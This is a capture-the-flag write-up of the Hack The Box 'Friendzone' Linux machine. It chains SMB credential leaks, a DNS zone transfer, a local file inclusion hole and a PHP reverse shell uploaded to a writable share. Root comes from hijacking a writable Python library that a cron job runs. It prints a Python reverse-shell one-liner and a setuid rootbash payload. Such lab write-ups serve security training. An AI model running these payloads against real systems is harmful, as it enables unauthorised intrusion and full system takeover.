Friendzone is an easy Linux box. It can be exploited by enumerating SMB and finding credentials which can be used to authenticate to an admin portal. This portal can be found by performing DNS enumeration and obtaining several new subdomains. The application was vulnerable to LFI and in combination with a writeable SMB share, this could be chained to obtain a low-level shell. Privileges were escalated by finding credentials in a configuration file and by abusing a writeable python library through python library hijacking.


I started by running NmapAutomator.
Nmap discovered the following open ports and services:

21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject:
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE,; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

The first thing I checked was for anonymous access with FTP, this was not possible. The next thing I checked was the HTTP server. This was the homepage of the application:

This gives a hint to: Which can also be observed by examining the certificate in the browser.

SMB Enumeration

My enumeration continued with SMB:

smbmap -H
[+] Guest session   	IP:	Name:                              
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	Files                                             	NO ACCESS	FriendZone Samba Server Files /etc/Files
	general                                           	READ ONLY	FriendZone Samba Server Files
	Development                                       	READ, WRITE	FriendZone Samba Server Files
	IPC$                                              	NO ACCESS	IPC Service (FriendZone server (Samba, Ubuntu))

And I checked the SMB version manually with wireshark:

I started examining the shares and found the following credentials:

smbclient \\\\\\general
lpcfg_do_global_parameter: WARNING: The "client lanman auth" option is deprecated
lpcfg_do_global_parameter: WARNING: The "client ntlmv2 auth" option is deprecated
Enter WORKGROUP\jeroen's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jan 16 21:10:51 2019
  ..                                  D        0  Mon Sep 28 14:19:07 2020
  creds.txt                           N       57  Wed Oct 10 01:52:42 2018

This file contained the following:

cat info/creds.txt 
creds for the admin THING:


Running SMBMAP again with these details results in the same findings. Also, I was not able to authenticate through FTP:

ncftp -u admin -p WORKWORKHhallelujah@#
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (
Connecting to                                                                                                               
(vsFTPd 3.0.3)
Login incorrect.

SMB Write Permissions

Then I focused on the last share ‘Development’. Since you have write permissions, you can write files to this share:

smb: \> put test.txt
putting file test.txt as \test.txt (0.1 kb/s) (average 0.1 kb/s)
smb: \> dir
  .                                   D        0  Mon Apr 26 15:41:20 2021
  ..                                  D        0  Mon Sep 28 14:19:07 2020
  test.txt                            A        5  Mon Apr 26 15:41:20 2021

This is always interesting and worth keeping in mind. I continued with my SMB enumeration and ran the following nmap script to obtain more information:

nmap --script smb-enum-shares -p 139,445
Starting Nmap 7.91 ( ) at 2021-04-26 16:03 CEST
Nmap scan report for (
Host is up (0.010s latency).

139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\\Development: 
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: 
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\\Files: 
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: 
|     Path: C:\etc\hole
|     Anonymous access: 
|     Current user access: 
|   \\\IPC$: 
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 1
|     Max Users: 
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\\general: 
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: 
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\\print$: 
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: 
|     Path: C:\var\lib\samba\printers
|     Anonymous access: 
|_    Current user access: 

The output was very useful as it contains file paths.

Webserver Enumeration

I continued with the webserver enumeration. I added the earlier observed domain to /etc/hosts and got shown the following page for

And for

Gobuster found two directories for

gobuster dir -w ~/wordlists/directory-list-lowercase-2.3-medium.txt -u -o dir-low_friendzone-red.txt -k -x txt,php

/admin                (Status: 301) [Size: 318] [-->]
/js                   (Status: 301) [Size: 315] [-->]

The admin directory was empty but the js directory contains the following file:

Testing some functions !

I'am trying not to break things !

This value changes each time a request is issued. When you check the source it has this comment attached:

Testing some functions !I'am trying not to break things !akxDa1NaSVNiODE2MTk0NDgwMTY0UnFzOTBybmps 

Comment: dont stare too much , you will be smashed ! , it's all about times and zones ! 

I tried to convert this with BurpSuite’s extender hackverter but did not manage to find anything.

DNS Enumeration

The last thing to check was DNS. Currently we are aware of two domains:

Let’s enumerate both:

dig axfr @

; (1 server found)
;; global options: +cmd	604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800	604800	IN	AAAA	::1	604800	IN	NS	localhost.	604800	IN	A 604800 IN	A 604800 IN	A 604800 IN	A 604800 IN	A

dig axfr @

; (1 server found)
;; global options: +cmd		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800		604800	IN	AAAA	::1		604800	IN	NS	localhost.		604800	IN	A 604800 IN A	604800	IN	A	604800	IN	A

Lets check all of these newly discovered domains.

When logging in with the credentials that were found earlier, you will get this message:

Let’s check the other admin page. 2:

Login was successful! It showed this message:

Login Done ! visit /dashboard.php

When navigating there, the following page is shown:

Let’s open Burp and add the parameter:

GET /dashboard.php?image_id=a.jpg&pagename=timestamp HTTP/1.1

I added it as URL parameter and the application returned this:

Something went worng ! , the script include wrong param !
Final Access timestamp is 1619452911

In the browser:

Local File Inclusion

Okay, this seems vulnerable to LFI. I created the following PHP file and added this to the SMB share Development (the one we discovered earlier with write access):

cat > test.php
 echo "Hello world!";

smbclient \\\\\\Development
smb: \> put test.php
putting file test.php as \test.php (0.7 kb/s) (average 0.7 kb/s)

Because of the Nmap output, you know where this file is stored, which is: Path: C:\etc\Development. To exploit the LFI, the following payload must be sent:

GET /dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=/etc/Development/test HTTP/1.1

HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 19:52:19 GMT

On our local machine we can verify this is our file with:

echo "IGVjaG8gIkhlbGxvIHdvcmxkITxicj4iOwo=" | base64 -d
echo "Hello world!";

Now you can upload a php-reverse-shell.php through SMB again and then issue the following request:

GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell HTTP/1.1

Please note that you must remove .php because the application adds this. This will provide you with a low level shell as www-data and will enable you to read the user.txt.

Privilege Escalation

Running linpeas showed the following information leakage inside a configuration file: When opening this file you will find credentials:

www-data@FriendZone:/tmp$ cat /var/www/mysql_data.conf
for development process this is the mysql creds for user friend




With these credentials you can open a session as friend. As the friend user, I ran linpeas again. It found these interesting directories: When navigating to the highlighted directory, the following script it shown:

friend@FriendZone:/opt/server_admin$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Jan 24  2019 .
drwxr-xr-x 3 root root 4096 Oct  6  2018 ..
-rwxr--r-- 1 root root  424 Jan 16  2019

This file contained the following contents:


import os

to_address = ""
from_address = ""

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to -from -ssl -port 465 -auth -smtp scheduled results email +cc +bc -v -user you -pass "PAPAP"'''


# I need to edit the script later
# Sam ~ python developer

Sam seems to have added an incomplete python script that has the os.system command as comment unfortunately. In addition, only root has write access to this file. Therefore, it seems that you cannot abuse this file to obtain privesc. I like to run pspy to see if any cronjobs are running on the system. With pspy you can notice that root runs this file every two minutes:

2021/04/28 23:40:01 CMD: UID=0    PID=60492  | /usr/bin/python /opt/server_admin/ 
2021/04/28 23:40:01 CMD: UID=0    PID=60491  | /bin/sh -c /opt/server_admin/

2021/04/28 23:42:01 CMD: UID=0    PID=60511  | /usr/bin/python /opt/server_admin/ 
2021/04/28 23:42:01 CMD: UID=0    PID=60510  | /bin/sh -c /opt/server_admin/

Therefore, it is very likely that this file has something to do with the privesc. After some more enumeration, another enumeration script `Linux smart enumeration script’ showed the following interesting writeable file:

Linpeas showed it as well with colour coding:

Since this is writeable, you can perform a privilege escalation through python library hijacking. This page explains this process. Since you are already in the os module, some reverse shells are a pain to get working. This would connect back for example:

import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);

But it would immediately die. To prevent this from happening you should remove the os. parts since you are already in this module. An easier method however, is the rootbash method, simply run this command:

echo "system ('cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash')" >> /usr/lib/python2.7/

Now you will have to wait till the cronjob is ran after which the payload will have executed. Now you can obtain a root shell by executing:

/tmp/rootbash -p


I really enjoyed this box and learned a lot from doing it. The breadth of this box is pretty cool because you will have to keep enumerating to continue with the puzzle. Exploiting the local file inclusion was quite tricky since you had to rely on the information from nmap but since it was obviously vulnerable to LFI this made it more doable. The privesc was really nice as well, it shows to always spend some more attention to writeable files. I hope you enjoyed this writeup as much as I enjoyed doing this box and that you learned some new things!